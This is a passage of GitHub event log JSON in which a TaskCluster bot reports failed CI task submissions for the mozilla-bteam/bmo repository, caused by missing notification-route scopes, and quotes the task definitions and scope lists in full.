\\\"queue:route:notify.email.dylan@hardison.net.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"U-KkBpwWQli_xkuTNA_VTg\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"API\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"webservices\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"1f36a82d520dd8a05326c222fff5152e10a716ab\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"dylanwh\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"93826b5e5289cef8b6b15ba630fe522d236e9933\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"dylan@hardison.net\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/httpd_error_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/httpd/error_log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"WebService API Tests\\\",\\n    \\\"description\\\": \\\"WebService API Tests\\\",\\n    \\\"owner\\\": \\\"dylan@hardison.net\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-27T02:16:26.166Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-28T02:16:26.166Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"Kgim6VDJR4KCRicihcOUZw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-28T02:16:26.166Z\\\"\\n}\\n  time:     2016-09-27T02:16:26.599Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"U-KkBpwWQli_xkuTNA_VTg\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"API\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"webservices\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"1f36a82d520dd8a05326c222fff5152e10a716ab\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"dylanwh\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"93826b5e5289cef8b6b15ba630fe522d236e9933\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"dylan@hardison.net\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/httpd_error_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/httpd/error_log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"WebService API Tests\\\",\\n    \\\"description\\\": \\\"WebService API Tests\\\",\\n    \\\"owner\\\": \\\"dylan@hardison.net\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-27T02:16:26.166Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-28T02:16:26.166Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"Kgim6VDJR4KCRicihcOUZw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-28T02:16:26.166Z\\\"\\n}\\n  time:     2016-09-27T02:16:26.599Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"U-KkBpwWQli_xkuTNA_VTg\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.dylan@hardison.net.on-any\",\n                        \"notify.irc-channel.#bteam.on-failed\",\n                        \"notify.irc-channel.#bteam.on-exception\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"symbol\": \"API\",\n                            \"machine\": {\n                                \"platform\": \"linux64\",\n                                \"build\": {\n                                    \"platform\": \"linux64\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"reruns\": 3,\n                        \"image\": \"mozillabteam/bmo-ci\",\n                        \"command\": [\n                            \"runtests.sh\"\n                        ],\n                        \"env\": {\n                            \"TEST_SUITE\": \"webservices\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"development\",\n                            \"GITHUB_BASE_SHA\": \"1f36a82d520dd8a05326c222fff5152e10a716ab\",\n                            \"GITHUB_BASE_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_HEAD_USER\": \"dylanwh\",\n                            \"GITHUB_HEAD_SHA\": \"93826b5e5289cef8b6b15ba630fe522d236e9933\",\n                            \"GITHUB_HEAD_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"dylan@hardison.net\"\n                        },\n                        \"artifacts\": {\n                            \"public/runtests_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/runtests.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            },\n                            \"public/httpd_error_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/httpd/error_log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            }\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"WebService API Tests\",\n                        \"description\": \"WebService API Tests\",\n                        \"owner\": \"dylan@hardison.net\",\n                        \"source\": \"https://github.com/mozilla-bteam/bmo.git\"\n                    },\n                    \"created\": \"2016-09-27T02:16:26.166Z\",\n                    \"deadline\": \"2016-09-28T02:16:26.166Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"Kgim6VDJR4KCRicihcOUZw\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-28T02:16:26.166Z\"\n                },\n                \"time\": \"2016-09-27T02:16:26.599Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.dylan@hardison.net.on-any\",\n                        \"queue:route:notify.irc-channel.#bteam.on-failed\",\n                        \"queue:route:notify.irc-channel.#bteam.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-bteam/bmo:branch:development\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:define-task:aws-provisioner-v1/b2gtest\",\n                    \"queue:route:gaia-taskcluster\",\n                    \"queue:route:index.garbage.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.bmo-development.*\",\n                    \"queue:route:tc-treeherder.bmo-master.*\",\n                    \"queue:route:tc-treeherder.bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    }\n]\n```"}},"created_at":"2016-09-27T02:16:26Z"}
{"id":"4621586110","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-bteam/bmo"},"payload":{"comment":{"id":19183817,"position":null,"line":null,"path":null,"commit_id":"93826b5e5289cef8b6b15ba630fe522d236e9933","created_at":"2016-09-27T02:16:26Z","updated_at":"2016-09-27T02:16:26Z","body":"Submitting the task to TaskCluster failed. You didn't give the task-graph scopes allowing it define tasks on the queue.Details:\n\n```js\n[\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"ZwA1sU9fQqSli28YJqi3vQ\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"San\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"sanity\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 8,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"639a051e3aea3608efd7607b944b2c33aa17cfe5\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"93826b5e5289cef8b6b15ba630fe522d236e9933\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozilla-bteam@noreply.github.com\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Basic Sanity Tests\\\",\\n    \\\"description\\\": \\\"Basic Sanity Tests\\\",\\n    \\\"owner\\\": \\\"mozilla-bteam@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-27T02:16:26.389Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-28T02:16:26.389Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DMPwKGYlRU63tistQqvPzQ\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-28T02:16:26.389Z\\\"\\n}\\n  time:     2016-09-27T02:16:26.735Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"ZwA1sU9fQqSli28YJqi3vQ\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"San\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"sanity\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 8,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"639a051e3aea3608efd7607b944b2c33aa17cfe5\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"93826b5e5289cef8b6b15ba630fe522d236e9933\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozilla-bteam@noreply.github.com\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Basic Sanity Tests\\\",\\n    \\\"description\\\": \\\"Basic Sanity 